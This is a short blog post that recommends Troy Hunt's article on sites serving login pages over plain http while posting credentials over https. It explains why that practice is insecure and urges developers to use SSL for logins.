Troy Hunt has a nice post on SSL and how many sites misuse it. As Hunt says, SSL is not about encryption. The problem that Hunt is writing about is sites that deliver a login page, say, in http and then post the login credentials over https. The idea is that the credentials are sent encrypted so everything is nice and secure. Often these sites will even display a padlock icon suggesting that the login is secure.
The problem, as Hunt explains in detail, is that the user has no way of knowing to whom those encrypted credentials are being sent. With SSL, the user is assured1 that the login screen is from the site it’s purported to be representing. If the login screen is not sent by SSL (indicated by an https connection) then the user has no way of knowing where it came from or where the login credentials will be sent once the user enters them.
Hunt gives real examples of governments exploiting this vulnerability so we’re not talking about a theoretical threat. Sadly, many sites continue to get this wrong putting their users at risk. That authoritarian governments are exploiting it means that it can literally be a matter of life and death. Remarkably, when Google moved Gmail to SSL the increase in load was within 1% of existing load so there really is no excuse for not using SSL at least for logins.
This is a great post and very informative. If you are developing Web sites, you definitely need to know this material. Hunt’s post is a great way to get started.